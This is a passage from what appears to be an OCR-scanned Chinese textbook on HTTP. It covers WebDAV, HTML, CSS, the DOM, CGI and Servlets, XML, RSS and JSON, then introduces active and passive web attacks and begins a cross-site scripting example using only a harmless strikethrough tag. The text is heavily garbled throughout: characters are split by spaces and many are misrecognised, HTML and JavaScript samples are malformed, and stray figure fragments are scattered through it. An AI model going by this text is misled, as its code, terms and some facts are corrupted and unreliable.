除了 创建 、 删 除 文件 等 基本 功能 ， 它 还 具备 文件 创建 者 管理 、 文 件 
编辑 过 程 中 禁止 其 他 用 户 内 容 窗 盖 的 加 锁 功能 ， 以 及 对 文件 内 容 修 改 的 
版 本 控制 功能 。 
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WebDAV 





WebDAV 直接 对 Web 服务 器 上 的 文件 进行 操作 WebDAV 
客户 端 服务 器 


复制 / 剪 切 文件 


加 锁 /解锁 文件 





图 : WebDAV 





使 用 HTTP/1.1 的 PUT 方法 和 DELETE 方法 ， 就 可 以 对 Web 服务 
器 上 的 文件 进行 创建 和 删除 操作 。 可 是 出 于 安全 性 及 便捷 性 等 考虑 ， 一 
般 不 使 用 。 


9.5.1 打 展 HTTP/1.1 的 WebDAV 
针对 服务 器 上 的 资源 ，WebDAYV 新 增加 了 一 些 概念 ， 如 下 所 示 。 


| el 1024KB 
| 创建 者 : ueno sen 





图 : WebDAV 扩展 的 概念 


集合 (Collection ) : 是 一 种 统一 管理 多 个 资源 的 概念 。 以 集合 为 单位 
可 进行 各 种 操作 。 也 可 实现 类 似 集合 的 集合 这 样 的 又 加 。 

资源 ( Resource ) : 把 文件 或 集合 称 为 资源 。 

属性 ( Property ) ; 定义 资源 的 属性 。 定 义 以 “名 称 = 值 ”的 格式 执行 。 
锁 ( Lock ) : 把 文件 设置 成 无 法 编辑 状态 。 多 人 同时 编辑 时 ， 可 防止 
在 同一 时 间 进 行内 容 写 入 。 


9.5.2 WebDAV 内 新 增 的 方法 及 状态 码 
WebDAV 为 实现 远程 文件 管理 ， 向 HTTP/1.1 中 追加 了 以 下 这 些 方法 。 


PROPFIND : 获取 属性 
PROPPATCH : 修改 属性 
MKCOL : 创建 集合 

192 COPY : 复制 资源 及 属性 
MOVE : 移动 资源 
LOCK : 资源 加 锁 
UNLOCK : 资源 解锁 


为 配合 扩展 的 方法 ， 状 态 码 也 随 之 扩展 。 


102 Processing : 可 正常 处 理 请 求 ， 但 目前 是 处 理 中 状态 

207 Multi-Status : 存在 多 种 状态 

422 Unprocessible Entity : 格式 正确 ， 内 容 有 误 

423 Locked : 资源 已 被 加 锁 

424 Failed Dependency : 处 理 与 某 请 求 关联 的 请 求 失败 ， 因 此 不 再 
维持 依赖 关系 

507 Insufficient Storage : 保存 空间 不 足 


图 WebDAV 的 请 求实 例 
下 面 是 使 用 PROPFIND 方法 对 http://www.example.com/file 发 起 获 


第 9 章 基于 HTTP 的 功能 追加 协议 


取 属 性 的 请 求 。 


国 WebDAV 的 响应 实例 193 
下 面 是 针对 之 前 的 PROPFIND 方法 ， 返 回 http://www.example.com/ 
file 的 属性 的 啊 应 。 
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<D:status>HTTP/1.1 200 OK</D:status> 
</D:propstat> 
<D:propstat> 
<D:prop><R:DingALing/><R:Random/></D:prop> 
<D:status>HTTP/1.1 403 Forbidden</D:status> 
<D:responsedescription> The user does not have access to the 
DingALing property. 
</D:responsedescription> 
</D:propstat> 
</D:response> 
< 了 :ITeEPonsedescription> There has been an access violation error. 
</D:responsedescription> 
</D:multistatus> 


为 何 HTTP 协议 受众 如 此 广泛 

本 章 讲 解 了 几 个 与 HTTP 相关 联 的 协议 使 用 案例 。 为 什么 HTTP 协议 
受众 能 够 如 此 广泛 呢 ? 

过 去 ， 新 编写 接 入 互联 网 的 系统 或 软件 时 ， 还 需要 同时 编写 实现 与 必 
要 功能 对 应 的 新 协议 。 但 最 近 ， 使 用 HTTP 的 系统 和 软件 占 了 绝 大 多 数 。 

这 有 着 诸多 原因 ， 其 中 与 企业 或 组 织 的 防火 墙 设 定 有 着 莫大 的 关系 。 
防火 墙 的 基本 功能 就 是 禁止 非 指定 的 协议 和 端口 号 的 数据 包 通 过 。 因 此 如 
果 使 用 新 协议 或 端口 号 则 必须 修改 防火 墙 设置 。 

互联 网 上 ， 使 用 率 最 高 的 当 属 Web。 不 管 是 否 具备 访问 FTP 和 SSH 
的 权限 ， 一 般 公司 都 会 开放 对 Web 的 访问 。Web 是 基于 HTTP 协议 运作 
的 ， 因 此 在 构建 Web 服务 器 或 访问 Web 站 点 时 ， 需 事先 设置 防火 墙 
HTTP( 80/tcp ) 和 HTTPS ( 443/tep ) 的 权限 。 

许多 公司 或 组 织 已 设 定 权限 将 HTTP 作为 通信 环境 ， 因 此 无 须 再 修改 
防火 墙 的 设 定 。 可 见 HTTP 具有 导入 简单 这 一 大 优势 。 而 这 也 是 基于 
HTTP 服务 或 内 容 不 断 增加 的 原因 之 一 。 

还 有 一 些 其 他 原因 ， 比 如 ， 作 为 HTTP 客户 端的 浏览 器 已 相当 普遍 ， 
HTTP 服务 器 的 数量 已 颇具 规模 ，HTTP 本 身 就 是 优异 的 应 用 等 。 
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在 Web 刚 出 现时 , 我 们 只 能 浏览 那些 页 面 样式 简单 的 内 容 。 如 今 ， 
Web 使 用 各 种 各 样 的 技术 ， 来 呈现 丰富 多 彩 的 内 容 。 








10.1 HTML 


10.1.1 Web 页 面 几 乎 全 由 HTML 构建 

HTML ( HyperText Markup Language， 超 文本 标记 语言 ) 是 为 了 发 
送 Web 上 的 超 文 本 ( Hypertext ) 而 开发 的 标记 语言 。 超 文本 是 一 种 文 
档 系 统 ， 可 将 文档 中 任意 位 置 的 信息 与 其 他 信息 (文本 或 图 片 等 ) 建立 
关联 ， 即 超 链接 文本 。 标 记 语言 是 指 通过 在 文档 的 某 部 分 穿插 特别 的 字 
符 串 标签 ， 用 来 修饰 文档 的 语言 。 我 们 把 出 现在 HTML 文档 内 的 这 种 
特殊 字符 串 叫 做 HTML 标签 ( Tag )。 

平时 我 们 浏览 的 Web 页 面 几乎 全 是 使 用 HTML 写成 的 。 由 
HTML 构成 的 文档 经 过 浏览 器 的 解析 、 演 染 后 ， 呈 现 出 来 的 结果 就 是 
Web 页 面 。 


浏览 器 打开 由 HTML 写 成 的 文档 


HTML 








就 可 浏览 党 染 后 的 Web 页 面 


: HTML 


以 下 就 是 用 HTML 编写 的 文档 的 例子 。 而 这 份 HTML 文档 内 这 种 
被 <> 包围 着 的 文字 就 是 标签 。 在 标签 的 作用 下 ， 文 档 会 改变 样式 ， 或 
插入 图 片 、 链 接 。 


<html> 
<head> E 
<meta TD ea -Typen ne chartaib ed Ys 


EEC 全 rr 
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<title>hackr .jp</title> 
<style type="text/css"> 
.logo { 
padding: 20px:; 
text-align: center; 
} 
</style> 
</head> 


<body> 

<div class="]ogo"> 
<p><img ph jpg" alt="photo" width="240" height="127" i 
<p><img src="hackr.gif" alt="hackr.jp" width="240" height="84" /></p> 

<p><a hrefrehetp， //hackr. RN I Sp 

</div> 

</body> 

</html> 


10.1.2 HTMIL 的 版 本 

Tim Bemers-Lee 提出 HTTP 概念 的 同时 ， 还 提出 了 HTML 原型。 
1993 年 在 仇 利 诺 伊 大 学 的 NCSA ( The National Center for Supercomputing 
Applications， 国 家 超级 计算 机 应 用 中 心 ) 发 布 『 Mosaic 浏览 器 (世界 
首 个 图 形 界面 浏览 占 程 订 )， 而 能 够 被 Mosaic 解析 的 HTML， 统 一 标准 
后 即 作 为 HTML 1.0 发 布 。 

目前 的 最 新 版 本 是 HIML4.01 标准 ，1999 年 12 月 W3C ( World 

Wide Web Consortium ) 组 织 推 存 使 用 这 一 版 本 。 下 一 个 版 本 ， 预 计 会 在 
2014 年 左右 正式 推荐 使 用 HTMLS 标准 。 

HTML5 标准 不 仅 解决 了 浏览 锅 之 间 的 兼容 性 问题 ， 并 且 可 把 文本 
作为 数据 对 待 ， 更 容易 复 用 ， 动 画 等 效果 也 变 得 更 生动 。 

时 至 今日 ，HTML 仍 存 在 较 多 悬而未决 问题 。 有 些 浏览 顺 未 遵循 
HTML 标准 实现 ， 或 扩展 目 用 标签 等 ， 这 都 反映 了 HTML 的 标准 实际 
上 尚未 统一 这 一 现状 。 
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10.1.3 ”设计 应 用 CSS 

CSS ( Cascading Style Sheets， 层 肢 样 式 表 ) 可 以 指定 如 何 展现 
HTML 内 的 各 种 元 素 ， 属 于 样式 表 标 准 之 一 。 即 使 是 相同 的 HIML 文 
档 ， 通 过 改变 应 用 的 CSS， 用 浏览 器 看 到 的 页 面 外 观 也 会 随 之 改变 。 
CSS 的 理念 就 是 让 文档 的 结构 和 设计 分 离 ， 达 到 解 看 的 目的 。 

下 面 让 我 们 来 看 一 个 CSS 的 用 例 。 


.logo { 
padding: 20px; 
text-align: center; 


} 


可 在 选择 需 (selector ) .logo 的 指定 范围 内 ， 使 用 {} 括 起 来 的 声明 
块 中 写 明 的 padding: 20px 等 声明 语句 应 用 指定 的 样式 。 

可 通过 指定 HTML 元 素 或 特定 的 class 、ID 等 作为 选择 器 来 限定 样 
式 的 应 用 范围 。 


10.2 动态 HTML 


10.2.1 让 Web 页 面 动 起 来 的 动态 HTML 

所 谓 动态 HTML ( Dynamic HTML )， 是 指使 用 客户 端 脚本 语言 将 静 
态 的 HTML 内 容 变 成 动态 的 技术 的 总 称 。 鼠 标 单 击 点 开 的 新 闻 、 
Google Maps 等 可 滚动 的 地 网 就 用 到 了 动态 HTML。 

动态 HTML 技术 是 通过 调用 客户 端 脚本 语言 JavaScript， 实 现 对 
HTML 的 Web 页 面 的 动态 改造 。 利 用 DOM ( Document Object Model， 
文档 对 象 模 型 ) 可 指定 欲 发 生动 态 变化 的 HTML 元 素 。 


10.2.2 更 易 探 制 HTML 的 DOM 
DOM 是 用 以 操作 HTML 文档 和 XML 文档 的 API(Application 
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Programming Interface， 应 用 编程 接口 )。 使 用 DOM 可 以 将 HTML 内 的 
元 素 当 作对 象 操作 ， 如 取出 元 素 内 的 字符 串 、 改 变 那 个 CSS 的 属性 等 ， 
使 页 面 的 设计 发 生 改 变 。 

通过 调用 JavaScript 等 脚本 语言 对 DOM 的 操作 ， 可 以 以 更 为 简单 
的 方式 控制 HTML 的 改变 。 


<body> E 
<hl1> 繁琐 的 Web 安 全 </hl> 
<p> 第 | 部 分 Web 的 构成 元 素 </p> 

“ <p> 第 中 部 分 浏览 器 的 安全 功能 </p> 
<p> 第 上 部 分 接 下 来 发 生 的 事 </p> 

</body> 


比如 ， 从 JavaScript 的 角度 来 看 ， 将 上 述 HTML 文档 的 第 3 个 P 元 
素 (了 标签 ) 改变 文字 颜色 时 ， 会 像 下 方 这 样 编写 代码 。 


<script type="text /javascript "> 
Var content = document .getElementsByTagName('P'); 
content [2] .style.color = '#FF0000'; 

</script> 


document.getElementsByTagName(P') 语句 调用 getElementsByTagName 
图 数 ， 从 整个 HTML 文档 ( document object ) 内 取出 了 元 素 。 接 下 来 的 
content[2].style.color = WFF0000' 语句 指定 content 的 索引 为 2( 第 3 个 ) 的 
元 素 的 样式 颜色 改 为 红色 ( #EFF0000 )。 

DOM 内 存在 各 种 函数 ， 使 用 它们 可 查阅 HTML 中 的 各 个 元 素 。 


Ss 
en 
> 99 
本 





10.3 Web 应 用 


10.3.1 通过 Web 提供 功能 的 Web 应 用 

Web 应 用 是 指 通过 Web 功能 提供 的 应 用 程序 。 比 如 购物 网 站 、 网 
上 银行 、SNS、BBS、 搜 索引 擎 和 e-learning 等 。 互 联网 ( Internet ) 或 
企业 内 网 ( Intranet ) 上 遍布 各 式 各 样 的 Web 应 用 。 

原本 应 用 HTTP 协议 的 Web 的 机 制 就 是 对 客户 端 发 来 的 请 求 ， 返 
回 事 前 准备 好 的 内 容 。 可 随 着 Web 越 来 越 普 及 ， 仅 靠 这 样 的 做 法 已 不 
足以 应 对 所 有 的 需求 ， 更 需要 引入 由 程序 创建 HTML 内 容 的 做 法 。 

类 似 这 种 由 程序 创建 的 内 容 称 为 动态 内 容 ， 而 事先 准备 好 的 内 容 称 
为 静态 内 容 。Web 应 用 则 作用 于 动态 内 容 之 上 。 


ISBN= 


请 求 ISBN=4798128090 4798128090 


Bi 





Wa 
EE 


Hate 3 


a 
Te 
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Be 
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3 中 


- 
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返回 由 Web 服 务 器 上 的 程序 
创建 的 HTML 内 容 











返回 事先 已 编写 
好 的 HTML ~ 


图 : 动态 内 容 和 静态 内 容 


10.3.2 与 Web 服务 器 及 程序 协作 的 CGI 
CGI( Common Gateway Interface， 通 用 网 关 接 口 ) 是 指 Web 服务 大 
在 接收 到 客户 端 发 送 过 来 的 请 求 后 转发 给 程序 的 一 组 机 制 。 在 CGI 的 
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作用 下 ， 程 序 会 对 请 求 内 容 做 出 相应 的 动作 ， 比 如 创建 HTML 等 动态 
内 容 。 

使 用 CGI 的 程序 叫做 CGI 程序 ， 通 常 是 用 Perl、PHP、Ruby 和 C 
等 编程 语言 编写 而 成 。 





CGI 程序 


: CGI 


有 关 CGI 更 为 翔实 的 内 容 请 参考 RFC3875 “The Common Gateway 
Interface (CGI) Version 1.1 





因 Java 而 普及 的 Serviet 

Servlet 是 一 种 能 在 服务 器 上 创建 动态 内 容 的 程序 。Servlet 是 用 
Java 语言 实现 的 一 个 接口 ， 属 于 面向 企业 级 Java (JavaEE，Java 
Enterprise Edition ) 的 一 部 分 。 

之 前 提 及 的 CGI， 由 于 每 次 接 到 请 求 ， 程 序 都 要 跟着 启动 一 次 。 因 
此 一 旦 访问 量 过 大 ，Web 服务 需要 承担 相当 大 的 负载 。 而 Servlet 运行 


山 没有 对 应 中 文 译 名 , 全 称 是 Java Servlet。 名 称 取 自 Servlet=ServerHApplet, 表 
示 轻 量 服务 程序 。 注 











在 与 Web 服务 器 相同 的 进程 中 ， 因 此 受到 的 负载 较 小 ”。Servlet 的 运行 
环境 叫做 Web 容 需 或 Servlet 容 硕 。 
Servlet 作为 解决 CGI 问题 的 对 抗 技 术 “， 随 Java 一 起 得 到 了 普及 。 


CGI 的 应 用 场景 





每 次 请 求 都 启动 新 的 CGI 程序 


Si 的 应 用 场景 


Es 


| - - -= 后 二 = = 
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Servlet 运 行 在 Web 容 中 内 


图 : Servlet 


随 着 CGI 的 普及 ， 每 次 请 求 都 要 启动 新 CGI 程序 的 CGI 运行 机 制 
逐渐 变 成 了 性 能 瓶颈 ， 所 以 之 后 Servlet 和 mod _perl 等 可 直接 在 Web 服 
务 器 上 运行 的 程序 才 得 以 开发 、 彰 及 。 


山 Servlet 常 驻 内 存 ， 因 此 在 每 次 请 求 时 ， 可 启动 相对 进程 级 别 更 为 轻 量 的 
Servlet， 程 序 的 执行 效率 从 而 变 得 更 高 。 一 一 译 者 注 

@ 说 对 抗 的 原因 在 于 ， 这 个 方向 上 已 存在 用 Perl 编 写 的 CGL， 实 现在 Apache 
HTTP Server 上 内 置 mod php 模块 后 可 运行 PHP 程 序 、 微 软 主 村 的 ASP 竺 技 
术 。 一 一 译 者 注 
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10.4 数据 发 布 的 格式 及 语言 


10.4.1 可 扩展 标记 语言 

XML ( eXtensible Markup Language， 可 扩展 标记 语言 ) 是 一 种 可 投 
应 用 目标 进行 扩展 的 通用 标记 霹 言 。 旨 在 通过 使 用 XML， 使 互联 网 数 
据 共 享 变 得 更 容易 。 

XML 和 HTML 都 是 从 标准 通用 标记 语言 SGML ( Standard Generalized 
Markup Language ) 简化 而 成 。 与 HTML 相 比 ， 它 对 数据 的 记录 方式 做 
了 特殊 处 理 。 

下 面 我 们 以 HTML 编写 的 某 公 司 的 研讨 会 议 议程 为 例 进 行 说 明 。 


<html> 
<head> 
<title>T 公 司 研讨 会 介绍 </title> 
</head> 
<body> 
<h1>T 公 司 研 讨 会 介绍 </hl> 
<Ul> 
<1i> 研 讨 会 编号 ; TR001 
<Ul> 
<1i>Web 应 用 程序 脆弱 性 诊断 讲座 </1i> 
</ul>s 
</1li> 
<11> 研 讨 会 编号 : TR002 
<Ul> 
<1i> 网 络 系统 脆弱 性 诊断 讲座 </1i> 
</ul> 
</1i> 
</ul> 
</body> 
</html> 


用 浏览 右 打 开 该 文档 时 ， 就 会 显示 排列 的 列表 内 容 ， 但 如 采 这 些 数 
据 被 其 他 程序 恋 取 会 发 生 什 么 ?” 某 些 程序 虽然 具备 可 通过 识别 布局 特征 











取出 文本 的 方法 , 但 这 份 HTML 的 样式 一 旦 改变 ， 要 谈 取 效 据 内 容 也 
就 变 得 相对 困难 了 。 可 见 ， 为 了 保持 数据 的 正确 读 取 ，HTML 不 适合 用 
来 记录 数据 结构 。 

接着 将 这 份 列 表 以 XML 的 形式 改写 就 成 了 以 下 的 示例 。 





人 Ee -0 0 


XML 和 HTML 一 样 ， 使 用 标签 构成 树 形 结构 ， 并 且 可 目 定 义 扩展 
标签 。 

从 XML 文档 中 读 取 数据 比 起 HTML 更 为 简单 。 由 于 XML 的 结构 
基本 上 都 是 用 标签 分 割 而 成 的 树 形 结构 ， 因 此 通过 语法 分 析 需 ( Parser ) 
的 解析 功能 解析 XML 结构 并 取出 数据 元 素 ， 可 更 容易 地 对 数据 进行 
读 取 。 

更 容易 地 复 用 数据 使 得 XML 在 互联 网 上 被 广泛 接受 。 比 如 ， 可 用 
在 2 个 不 同 的 应 用 之 间 的 交换 数据 格式 化 。 

10.4.2 发布 更 新 信息 的 RSS/Atom 

RSS ( 简易 信息 聚合 ， 也 叫 聚 合 内 容 ) 和 Atom 都 是 发 布 新 闻 或 博 
客 日 志 等 更 新 信息 文档 的 格式 的 总 称 。 两 者 都 用 到 了 XML 。 

RSS 有 以 下 版 本 ， 名 称 和 编写 方式 也 不 相同 。 


RSS 0.9 ( RDF Site Summary ) : 最 初 的 RSS 版本。1999 年 3 月 
由 网 景 通 信 公 司 上 自行 开发 用 于 其 门户 网 站 。 基 础 构图 创建 在 初期 的 
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RDF 规格 上 。 

RSS 0.91 ( Rich Site Summary ) : 在 RSS0.9 的 基础 上 扩展 元 素 ， 
于 1999 年 7 月 开发 完毕 。 非 RDF 规格 ， 使 用 XML 方式 编写 。 
RSS 1.0 ( RDF Site Summary ) : RSS 规格 正 处 于 混乱 状态 。2000 
年 12 月 由 RSS-DEV 工作 组 再 次 采用 RSS0.9 中 使 用 的 RDF 规格 
发 布 。 

RSS2.0 ( Really Simple Syndication ) : 非 RSS1.0 发 展 路 线 。 增 加 
支持 RSS0.91 的 兼容 性 ，2000 年 12 月 由 UserLand Software 公司 开 
发 完成 。 


Atom 具有 以 下 两 种 标准 。 


Atom 供稿 格式 ( Atom Syndication Format ) : 为 发 布 内 容 而 制定 
的 网 站 消息 来 源 格式 ， 单 讲 Atom 时 ， 就 是 指 此 标准 。 

Atom 出 版 协定 ( Atom Publishing Protocol ) : 为 Web 上 内 容 的 新 
增 或 修改 而 制定 的 协议 。 


用 于 订阅 博客 更 新 信息 的 RSS 阅读 器 ， 这 种 应 用 几乎 支持 RSS 的 
所 有 版 本 以 及 Atom。 
下 面 是 RSS1.0 的 示例 。 





<link>http://d.hatena.ne.jp/sen-u/</link> 
<description> 兔子 的 文学 日 记 </description> 
</channel> 


<item rdf:about="http://d.hatena.ne.jp/sen-u/20121215/p1"> 
<title> [security] 提供 脆弱 性 悬赏 奖金 计划 的 网 站 一 览 </title> 
<link>http://d.hatena.ne.jp/sen-u/2012121i5/pl</l1ink> 
<description> 正 是 所 谓 “ 是 所 谓 Bounty Programs 、 对 

处 理 接受 Web 脆弱 性 的 相关 信息 ， 并 提供 奖金 的 计划 . . .</description> 
<dc:creator>sen-u</dc:creator> 
<dc:date>2012-12-l5</dc:date> 
<dc:subject>security</dc:subject> 

</item> 


10.4.3 ” JavaScript 衍生 的 轻 量 级 易 用 JSON 

JSON ( JavaScript Object Notation ) 是 一 种 以 JavaScript ( ECMAScript ) 
的 对 象 表示 法 为 基础 的 轻 量 级 数据 标记 语言 。 能 够 处 理 的 数据 类 型 有 
false/nulytrue/ 对 象 / 数组 /数字 / 字符 串 ， 这 7 种 类 型 。 





{"name": "Web Application Security", "num": "TR001")} 


JSON 让 数据 更 轻 更 纯粹 ， 并 且 JSON 的 字符 串 形式 可 被 JavaScript 
轻易 地 读 入 。 当 初 配 合 XML 使 用 的 Ajax 技术 也 让 JSON 的 应 用 变 得 更 
为 广泛 。 另 外 ， 甚 他 各 种 编程 语言 也 提供 丰富 的 库 类 ， 以 达到 轻便 操作 
JSON 的 目的 。 

有 关 JSON 更 为 翔实 的 内 容 请 参考 RFC4627 “The application/json 
Media Type for JavaScript Object Notation (JSON) 
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互联 网 上 的 攻击 大 都 将 Web 站 点 作为 目标 。 本 章 讲解 具体 有 哪些 
攻击 Web 站 点 的 手段 ， 以 及 攻击 会 造成 怎样 的 影 啊 。 
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11.1 针对 Web 的 攻击 技术 


简单 的 HTTP 协议 本 身 并 不 存在 安全 性 问题 ， 因 此 协议 本 身 几乎 不 
会 成 为 攻击 的 对 象 。 应 用 HTTP 协议 的 服务 器 和 客户 端 ， 以 及 运行 在 服 
务 器 上 的 Web 应 用 等 资源 才 是 攻击 目标 。 

目前 ,来 目 互 联网 的 攻击 大 多 是 冲 着 Web 站 点 来 的 ， 它们 大 多 把 
Web 应 用 作为 攻击 目标 。 本 章 主要 针对 Web 应 用 的 攻击 技术 进行 讲解 。 
Exim 2% 


ProFTPD 
3og% x 








互联 网 上 重要 攻击 事件 明细 
参见 ，LAC JSOC 株 式 会 社 的 入 侵 分 析 倾 向 报告 Vol.18 (2012 年 4 月 26 日 ) 


图 : 攻击 事件 倾向 


11.1.1 HTTP 不 具备 必要 的 安全 功能 

与 最 初 的 设计 相 比 ， 现 今 的 Web 网 站 应 用 的 HTTP 协议 的 使 用 方 
式 已 发 生 了 了 翻天覆地 的 变化 。 几 乎 现今 所 有 的 Web 网 站 都 会 使 用 会 话 
( session ) 管理 、 加 密 处 理 等 安全 性 方面 的 功能 ， 而 HTTP 协议 内 并 不 
具备 这 些 功能 。 

从 整体 上 看 ，HTTP 就 是 一 个 通用 的 单纯 协议 机 制 。 因 此 它 具 备 较 
多 优势 ,但 是 在 安全 性 方面 则 呈 沙 势 。 

就 拿 远程 登录 时 会 用 到 的 SSH 协议 来 说 ，SSH 具备 协议 级 别 的 认 
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证 及 会 话 管 理 等 功能 ，HTTP 协议 则 没有 。 男 外 在 架设 SSH 服务 方面 ， 
任何 人 都 可 以 轻易 地 创建 安全 等 级 高 的 服务 ， 而 HTTP 即使 已 架设 好 服 
务 器 ， 但 若 想 提供 服务 器 基础 上 的 Web 应 用 ， 很 多 情况 下 都 需要 重新 

因此 ， 开 发 者 需要 目 行 设计 并 开发 认证 及 会 话 管 理 功能 来 满足 Web 
应 用 的 安全 。 而 目 行 设计 就 意味 着 会 出 现 各 种 形形色色 的 实现 。 结 果 ， 
安全 等 级 并 不 完备 ， 可 仍 在 运作 的 Web 应 用 背后 却 隐藏 着 各 种 容易 被 
攻击 者 滥用 的 安全 漏洞 的 Bug。 


11.1.2 ”在 客户 端 即 可 段 改 请 求 

在 Web 应 用 中 ， 从 浏览 名 那 接收 到 的 HTTP 请 求 的 全 部 内 容 ， 都 
可 以 在 客户 端 自由 地 变更 、 算 改 。 所 以 Web 应 用 可 能 会 接收 到 与 预期 
数据 不 相同 的 内 容 。 

在 HTTP 请 求 报 文 内 加 载 攻击 代码 ， 就 能 发 起 对 Web 应 用 的 攻击 。 
通过 URL 查询 字段 或 表单 、HTTP 首部 、Cookie 等 途径 把 攻击 代码 传 
和 人 人， 若 这 时 Web 应 用 存在 安全 漏洞 ， 那 内 部 信息 就 会 遭 到 家 取 ， 或 被 
攻击 者 拿 到 管理 权限 。 






攻击 者 
通过 URL 查询 字段 或 表单 、HTTP 首 
部 、Cookie 等 途径 把 攻击 代码 传 入 


图 : 对 Web 应 用 的 攻击 








对 Web 应 用 的 攻击 模式 有 以 下 两 种 


s 主动 攻击 
@ 被 动 攻 击 


国 以 服务 肴 为 目标 的 主动 攻击 

主动 攻击 ( active attack ) 是 指 攻击 者 通过 直接 访问 Web 应 用 ， 把 
攻击 代码 传人 的 攻击 模式 。 由 于 该 模式 是 直接 针对 服务 器 上 的 资源 进行 
攻击 ， 因 此 攻击 者 需要 能 够 访问 到 那些 资源 。 

主动 攻击 模式 里 具有 代表 性 的 攻击 是 SQL 注入 攻击 和 OS 命令 注 和 人 
攻击 。 


主要 攻击 服务 器 上 的 资源 





中 执行 攻击 代码 





] 2 





行 命令 等 
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图 : 主动 攻击 


国 以 服务 帝 为 目标 的 被 动 攻击 
被 动 攻击 〈 passive attack ) 是 指 利用 圈套 策略 执行 攻击 代码 的 攻击 模 
式 。 在 被 动 攻击 过 程 中 ， 攻 击 者 不 直接 对 目标 Web 应 用 访问 发 起 攻击 。 
被 动 攻击 通常 的 攻击 模式 如 下 所 示 。 
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步骤 1: 攻击 者 请 使 用 户 触 发 已 设置 好 的 陷阱 ， 而 陷阱 会 局 动 发 送 


已 髓 人 攻击 代码 的 HTTP 请 求 。 
步骤 2: 当 用 户 不 知 不 觉 中 招 之 后 ， 用 户 的 浏览 器 或 邮件 客户 端 就 
会 触发 这 个 陷阱 。 


步骤 3: ”中 招 后 的 用 户 浏览 需 会 把 含有 攻击 代码 的 HTTP 请 求 发 送 
给 作为 攻击 目标 的 Web 应 用 ， 运 行 攻击 代码 。 

步骤 4: ”执行 完 攻 击 代 码 ， 存 在 安全 漏洞 的 Web 应 用 会 成 为 攻击 
痢 的 跳板 ， 可 能 导致 用 户 所 持 的 Cookie 等 个 人 信息 被 究 
取 ， 登 录 状 态 中 的 用 户 权 限 遭 恶意 滥用 等 后 果 。 
征 动 攻击 模式 中 具有 代表 性 的 攻击 是 跨 站 脚本 攻击 和 路 站 
点 请 求 伪 造 。 


“主要 攻击 用 户 的 资源 和 权限 








4 执行 攻击 代码 的 后 果 是 用 户 所 
持 的 Cookie 等 被 窃取 、 用 户 权 
限 遭 恶意 滥用 








公 ) 用 户 的 浏览 器 运行 攻击 代码 






名 用 户 的 浏览 器 触发 事先 已 设 好 
陷阱 的 HTTP 请 求 


攻击 者 
图 : 被 动 攻 击 
利用 用 户 的 身份 攻击 企业 内 部 网 络 
利用 被 动 攻击 ， 可 发 起 对 原本 从 互联 网 上 无 法 直接 访问 的 企业 内 网 
等 网 络 的 攻击 。 只 要 用 户 踏 入 攻击 者 预先 设 好 的 陷阱 ， 在 用 户 能 够 访问 








到 的 网 络 范围 内 ， 即 使 是 企业 内 网 也 同样 会 受到 攻击 。 

很 多 企业 内 网 依然 可 以 连接 到 互联 网 上 ， 访 问 Web 网 站 ， 或 接收 互 
联网 发 来 的 邮件 。 这 样 就 可 能 给 攻击 者 以 可 乘 之 机 ， 诱 导 用 户 和 触发 陷阱 
后 对 企业 内 网 发 动 攻 击 。 






利用 用 户 身 





号 企业 内 网 用 户 的 浏览 器 运行 i 
\ 一 一 一 一 一 mnie = a 
户 


全 用户 的 浏览 器 触发 事先 已 设 好 陷阱 的 
HTTP 请 求 
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企业 内 网 的 Web 服 务 器 


了 陷阱 诱导 





图 : 利用 被 动 攻击 对 企业 内 网 发 动 攻击 


11.2 ” 因 输 出 值 转 义 不 完全 引发 的 安全 漏洞 
实施 Web 应 用 的 安全 对 策 可 大 致 分 为 以 下 两 部 分 。 
e 客户 端的 验证 
e Web 应 用 端 ( 服务 器 端 ) 的 验证 
5 输入 值 验证 
5 输出 值 转 义 
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HTTP 响应 
一 一 一 一 人 


访问 DB 
一 一男 





访问 文件 “| 
a T 





客户 端的 验证 Web 应 用 端的 验证 
图 : 验证 数据 的 几 个 地 方 


多 数 情 况 下 采用 JavaScript 在 客户 端 验证 数据 。 可 是 在 客户 问 允 许 
算 改 数据 或 关闭 JavaScript， 不 适合 将 JavaScript 验证 作为 安全 的 防范 对 
策 。 保 留 客户 端 验证 只 是 为 了 尽早 地 辨识 输 和 错误， 起 到 提高 UI 体验 
的 作用 。 

Web 应 用 端的 输入 值 验证 按 Web 应 用 内 的 处 理 则 有 可 能 被 误 认 为 
是 具有 攻击 性 意义 的 代码 。 输 入 值 验证 通常 是 指 检查 是 否 是 符合 系统 业 
务 逻 辑 的 数值 或 检查 字符 编码 等 预防 对 策 。 

从 数据 库 或 文件 系统 、HTML 、 邮 件 等 输出 Web 应 用 处 理 的 数据 之 
际 ， 针 对 输出 做 值 转 义 处 理 是 一 项 至 关 重 要 的 安全 策略 。 当 输出 全 转 义 
不 完全 时 ， 会 因 触 发 攻击 者 传人 的 攻击 代码 ， 而 给 输出 对 象 市 来 损害 。 


11.2.1 跨 站 脚本 攻击 

跨 站 脚本 攻击 ( Cross-Site Scripting，XSS ) 是 指 通过 存在 安全 漏洞 
的 Web 网 站 注册 用 户 的 浏览 器 内 运行 非法 的 HTML 标签 或 JavaScript 
进行 的 一 种 攻击 。 动 态 创 建 的 HTML 部 分 有 可 能 隐藏 着 安全 漏洞 。 就 
这 样 ， 攻 击 者 编写 脚本 设 下 陷阱 ， 用 户 在 目 己 的 浏览 疮 上 运行 时 ， 一 不 
小 心 就 会 受到 被 动 攻击 。 

跨 站 脚本 攻击 有 可 能 造成 以 下 影响 。 


8 利用 虚假 输入 表单 骗取 用 户 个 人 信息 。 
e 利用 脚本 窃取 用 户 的 Cookie 值 ， 被 害 者 在 不 知情 的 情况 下 ， 帮 助 








攻击 者 发 送 恶意 请 求 。 
9 显示 伪 知 的 文章 或 图 片 。 


图 跨 站 脚本 攻击 案例 
在 动态 生成 HTML 处 发 生 

下 面 以 编辑 个 人 信息 页 面 为 例 讲解 跨 站 脚本 攻击 。 下 方 界面 显示 了 
用 户 输入 的 个 人 信息 内 容 。 


| \ _ | 姓名 山口 一 部 
b 直 邮箱 地 址 pt com 站 





动态 生成 HTML 处 有 可 能 隐 含 安全 漏洞 
图 : 解 跨 站 脚本 攻击 案例 


确认 界面 按 原 样 显示 在 编辑 界面 输入 的 字符 串 。 此 处 输入 市 有 山口 
一 郎 这 样 的 HTML 标签 的 字符 串 。 


姓名 一 一 一 中 
邮箱 地 址 yama@example.com 





: 按照 输入 内 容 原 样 显示 的 机 制 
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此 时 的 确认 界面 上 上， 浏览 器 会 把 用 户 输入 的 <s> 解析 成 HTML 标 
签 ， 然 后 显示 删除 线 。 

